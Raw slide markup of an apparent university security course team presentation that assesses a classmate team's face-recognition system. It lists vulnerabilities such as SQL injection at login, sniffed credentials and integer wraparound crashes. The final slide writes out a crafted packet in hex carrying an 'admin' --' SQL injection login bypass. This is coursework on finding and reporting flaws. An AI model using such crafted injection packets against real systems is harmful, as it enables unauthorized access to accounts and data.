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8" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="297" r:id="rId5"/>
    <p:sldId id="346" r:id="rId6"/>
    <p:sldId id="306" r:id="rId7"/>
    <p:sldId id="334" r:id="rId8"/>
    <p:sldId id="356" r:id="rId9"/>
    <p:sldId id="359" r:id="rId10"/>
    <p:sldId id="298" r:id="rId11"/>
    <p:sldId id="342" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="361" r:id="rId14"/>
    <p:sldId id="349" r:id="rId15"/>
    <p:sldId id="328" r:id="rId16"/>
    <p:sldId id="300" r:id="rId17"/>
    <p:sldId id="336" r:id="rId18"/>
    <p:sldId id="373" r:id="rId19"/>
    <p:sldId id="374" r:id="rId20"/>
    <p:sldId id="375" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="357" r:id="rId23"/>
    <p:sldId id="362" r:id="rId24"/>
    <p:sldId id="363" r:id="rId25"/>
    <p:sldId id="364" r:id="rId26"/>
    <p:sldId id="365" r:id="rId27"/>
    <p:sldId id="367" r:id="rId28"/>
    <p:sldId id="302" r:id="rId29"/>
    <p:sldId id="379" r:id="rId30"/>
    <p:sldId id="303" r:id="rId31"/>
    <p:sldId id="324" r:id="rId32"/>
    <p:sldId id="394" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="332" r:id="rId35"/>
    <p:sldId id="333" r:id="rId36"/>
    <p:sldId id="307" r:id="rId37"/>
    <p:sldId id="322" r:id="rId38"/>
    <p:sldId id="316" r:id="rId39"/>
    <p:sldId id="376" r:id="rId40"/>
    <p:sldId id="380" r:id="rId41"/>
    <p:sldId id="395" r:id="rId42"/>
    <p:sldId id="381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05" r:id="rId53"/>
    <p:sldId id="396" r:id="rId54"/>
    <p:sldId id="392" r:id="rId55"/>
    <p:sldId id="31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000"/>
    <a:srgbClr val="0B1C2B"/>
    <a:srgbClr val="3A0000"/>
    <a:srgbClr val="0F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269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3761A-9D93-4144-A731-A85A3B86A506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7C26-9AAB-4EF5-9C44-A0AA94CD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3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37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4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9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1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93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2417" y="1122363"/>
            <a:ext cx="9507166" cy="238760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latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CMU Security Specialist Course</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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44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20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rPr>
              <a:t>Team Project </a:t>
            </a:r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Phase 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4400">
              <a:solidFill>
                <a:schemeClr val="accent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34940"/>
            <a:ext cx="9144000" cy="2488211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en-US" altLang="ko-KR" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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Six senses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000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Team 6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Seongju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Moon (L)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Kyungnam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Bae (E)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Jinmo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Kim (A)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Jeonghwan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ahn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Byungchul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Park (C)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650" y="1309238"/>
            <a:ext cx="102291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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromise Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Obtain user picture and name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromise Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Pollute user DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromise Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Make the system not working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132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Severity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1466" y="508000"/>
            <a:ext cx="384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Team 1 system</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2" descr="https://media.discordapp.net/attachments/844851665566826506/860023354571751454/team1_capture.PNG?width=886&amp;height=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46" y="1338997"/>
            <a:ext cx="6377305" cy="453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706880"/>
            <a:ext cx="10858500" cy="4866640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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High </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>performance (less delay) even in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the secure mode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Firewall used so cannot scan ports using ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’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Sound recovery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>logic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>case of crash or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>assert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95300" y="481929"/>
            <a:ext cx="8003876" cy="1143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7200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>First Impression</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="72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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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272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Severity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23" y="601166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Pre-cut Battery Box Door Key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01166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26250" y="3779840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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061923" y="3779840"/>
            <a:ext cx="3960000" cy="2520000"/>
            <a:chOff x="1061923" y="3779840"/>
            <a:chExt cx="3960000" cy="2520000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 4" descr="Network security in a world of encryption - Information Ag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23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19877204">
              <a:off x="2635776" y="4925809"/>
              <a:ext cx="1096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AES</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="32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128</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="32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8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601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v4.7.0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00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" kern="1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601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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>v4.7.0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2400" kern="10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00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" kern="1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4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5" y="0"/>
            <a:ext cx="1012286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480" y="4314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Bae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8278" y="25246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Kim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8729" y="29882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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1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Ahn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947" y="276045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Park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9178" y="306813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Moon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5864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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>v4.7.0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2400" kern="10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 dirty="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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" kern="100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Resource restriction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749844" y="548043"/>
            <a:ext cx="3011170" cy="13188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 Server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information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 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IP and port)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pic>
        <p:nvPicPr>
          <p:cNvPr id="23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71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66240" y="2219483"/>
            <a:ext cx="3070359" cy="368347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54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899" y="2219483"/>
            <a:ext cx="3070359" cy="368347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13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7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677292" y="2895600"/>
            <a:ext cx="774308" cy="16154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71" y="95838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78000"/>
            <a:ext cx="5760000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424960"/>
            <a:ext cx="5760000" cy="32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60" y="3424960"/>
            <a:ext cx="5760000" cy="32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60" y="378000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-15000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497840" y="378000"/>
            <a:ext cx="5760000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424960"/>
            <a:ext cx="5760000" cy="32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60" y="3424960"/>
            <a:ext cx="5760000" cy="32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60" y="378000"/>
            <a:ext cx="5760000" cy="32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983" y="3792750"/>
            <a:ext cx="279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[SERVER/ACCESS]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0329" y="3795820"/>
            <a:ext cx="1970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[NETWORK]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8079" y="666540"/>
            <a:ext cx="2715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[CLIENT/BINARY]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4225" y="666540"/>
            <a:ext cx="2287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[SERVERINFO]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Static Analysis? Static Code Analysis Overview | Perforc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82" y="3760804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82" y="777278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695224" y="5699760"/>
            <a:ext cx="85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Static</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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172" name="Picture 4" descr="Fuzz Testing Archives | Beyond Security Blo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20" y="3760804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3915" y="4013200"/>
            <a:ext cx="806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Fuzz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78" y="1505082"/>
            <a:ext cx="144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20" y="777278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05015" y="1505082"/>
            <a:ext cx="144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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resource restriction</a:t>
            </a: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Lessons learned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SQL injection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by-passing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authentication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Buffer overflow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reading or writing beyond legitimate area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Unsigned wraparound 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making use of unsinged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wraparound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Format string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mainly used for leaking data on the stack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Revealed key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decrypting secure data using revealed keys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Sniffing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sniffing packets over the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Spoofing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so-called, man in the middle attack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Brute-force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trying all possible input until success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Craft packet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crafting and sending a customized packet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Tampering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modifying system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components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SQL injection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by-passing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authentication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Buffer overflow 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reading or writing beyond legitimate area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Unsigned wraparound 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making use of unsinged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wraparound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Format string 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mainly used for leaking data on the stack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Revealed key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decrypting secure data using revealed keys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Sniffing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sniffing packets over the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Spoofing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so-called, man in the middle attack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Brute-force 	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trying all possible input until success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Craft packet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crafting and sending a customized packet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Tampering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modifying system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components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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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8F2D1BDA-23B8-4349-8984-BE1B4BD4CD68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144551" y="108882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14527EA-3F5E-4A77-AA8B-A562C5B0F6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537609" y="2079730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BD37F2FA-E8CD-47F0-B041-42281CBBD1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960551" y="378530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AFCD2F96-5CAE-4D55-9CC1-0C2A73C51C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321996" y="202584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79C1EAE1-FF6A-457D-B34B-58B6205BD145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366723" y="326355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D3BF1A94-9942-40EE-9FC7-1FC2D6573A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935578" y="2251374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290C5C0B-6FF7-47DE-AA13-1D7BA72EEACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486642" y="1067875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C88302A2-9351-4F02-B76E-00161A78BDBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8685990" y="2029687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AF6CE26B-897D-48B0-B910-084056A7C677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442877" y="53099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2176C940-B3F5-4781-A426-FE55D18A29BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417731" y="5488845"/>
            <a:ext cx="1020234" cy="605909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Security Design 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9" name="Google Shape;218;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482045" y="3997270"/>
            <a:ext cx="1656109" cy="56512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Log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Google Shape;194;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973933" y="6092299"/>
            <a:ext cx="684076" cy="28803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1" name="Google Shape;193;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709710" y="6097835"/>
            <a:ext cx="22179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>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unspecified </a:t>
            </a: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7CE5C7E7-6196-4919-9E26-F786109572D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834773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1413D02F-4376-472C-B5B6-9D3FAE116D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321132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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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8F2D1BDA-23B8-4349-8984-BE1B4BD4CD68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144551" y="108882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xmlns="" id="{214527EA-3F5E-4A77-AA8B-A562C5B0F6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537609" y="2079730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BD37F2FA-E8CD-47F0-B041-42281CBBD1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960551" y="378530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AFCD2F96-5CAE-4D55-9CC1-0C2A73C51C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321996" y="202584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79C1EAE1-FF6A-457D-B34B-58B6205BD145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366723" y="326355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D3BF1A94-9942-40EE-9FC7-1FC2D6573A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935578" y="2251374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290C5C0B-6FF7-47DE-AA13-1D7BA72EEACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486642" y="1067875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C88302A2-9351-4F02-B76E-00161A78BDBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8685990" y="2029687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xmlns="" id="{AF6CE26B-897D-48B0-B910-084056A7C677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442877" y="53099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2176C940-B3F5-4781-A426-FE55D18A29BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417731" y="5488845"/>
            <a:ext cx="1020234" cy="605909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Security Design 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9" name="Google Shape;218;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482045" y="3997270"/>
            <a:ext cx="1656109" cy="56512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Log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Google Shape;194;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973933" y="6092299"/>
            <a:ext cx="684076" cy="28803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1" name="Google Shape;193;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709710" y="6097835"/>
            <a:ext cx="22179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>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unspecified </a:t>
            </a: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2" name="폭발 1 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302516" y="4352578"/>
            <a:ext cx="766103" cy="81118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V01V09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3" name="폭발 1 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336954" y="4304669"/>
            <a:ext cx="752315" cy="794666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4" name="폭발 1 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2408437" y="2946233"/>
            <a:ext cx="747330" cy="738437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폭발 1 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3796920" y="1912577"/>
            <a:ext cx="1611236" cy="1518565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V04,V05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V08,V10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8" name="폭발 1 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919355" y="6048710"/>
            <a:ext cx="460785" cy="474863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9" name="Google Shape;197;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6350326" y="6116885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Vulnerability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7CE5C7E7-6196-4919-9E26-F786109572D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834773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1413D02F-4376-472C-B5B6-9D3FAE116D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321132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6" name="폭발 1 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827098" y="2667632"/>
            <a:ext cx="770664" cy="75722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7" name="폭발 1 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8418464" y="3626295"/>
            <a:ext cx="817455" cy="81118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V06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0" name="폭발 1 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298872" y="3415034"/>
            <a:ext cx="753606" cy="770617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9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33332"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="414072" y="715990"/>
          <a:ext cx="11352362" cy="5502324"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="886432"/>
                <a:gridCol w="10465930"/>
              </a:tblGrid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Insert an arbitrary id/password to DB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Sniffing the id/password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V03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Exposed user credentials in the server log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V04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Infinite loop in the NetworkTCP.cpp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V05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Unintentional handling of the protocol message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V06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Weak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passwords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that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enable brute force attacks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V07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SQL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injection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for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V08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Memory leakage in the '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="200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get_a_packet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 function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V09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Extraction of name and face image data used by the face </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="200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recog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AI engine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V10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system cannot be operated on the big endian architectures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Possible MITM attack using certificate change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Crash by unsigned</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="20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 wraparound related in the packet size</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" alt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1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11187"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="414072" y="715990"/>
          <a:ext cx="11352362" cy="5502324"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="886432"/>
                <a:gridCol w="10465930"/>
              </a:tblGrid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Insert an arbitrary id/password to DB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Sniffing the id/password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V03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Exposed user credentials in the server log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V04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Infinite loop in the NetworkTCP.cpp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V05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Unintentional handling of the protocol message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V06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Weak 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passwords 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that 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enable brute force attacks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V07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SQL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injection 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for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V08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Memory leakage in the '</a:t>
                      </a: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get_a_packet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 function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V09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Extraction of name and face image data used by the face </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" kern="1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recog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AI engine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V10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system cannot be operated on the big endian architectures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Possible MITM attack using certificate change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V12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Crash by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unsigned</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" kern="1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integer wraparound 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related in the packet size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V07 – SQL injection for login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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REVIEW/CODE]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[SQLINJECTION] [CRAFTPACKET]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Craft packet for SQL injection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\x53\x42\x31\x54\x21\x00\x00\x00\xC7\x8C\x07\x3C\xE8\x03\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x0A\x0B\x61\x64\x6D\x69\x6E\x27\x20\x2D\x2D\x20\x27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\x12\x02\x30\x30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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\x0A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
